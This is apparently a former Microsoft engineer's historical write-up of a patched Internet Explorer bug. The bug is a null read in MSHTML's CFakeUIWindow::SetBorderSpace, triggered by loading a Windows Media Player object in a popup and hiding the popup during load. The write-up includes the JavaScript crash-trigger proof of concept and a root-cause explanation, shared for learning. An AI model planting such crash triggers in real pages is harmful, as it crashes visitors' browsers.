Loading a Windows Media Player <object> inside a createPopup document and hiding the popup during the same load cycle caused a null read in MSHTML!CFakeUIWindow::SetBorderSpace. Classified PROBABLY_NOT_EXPLOITABLE.

<script language="JavaScript">
var myPop;
function main()
{
	myPop = createPopup();
	myPop.show(0,0,100,100);
	myPop.document.write('<script defer>top.myPop.hide();<\/script><object classid="clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6"></object>');
	myPop.document.close();
}
</script>

The deferred script called hide() on the popup before WMP had finished initializing inside it. CFakeUIWindow::SetBorderSpace — called as part of the ActiveX site setup — expected a valid UI window pointer that had already been released when the popup was hidden, leading to the null dereference.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.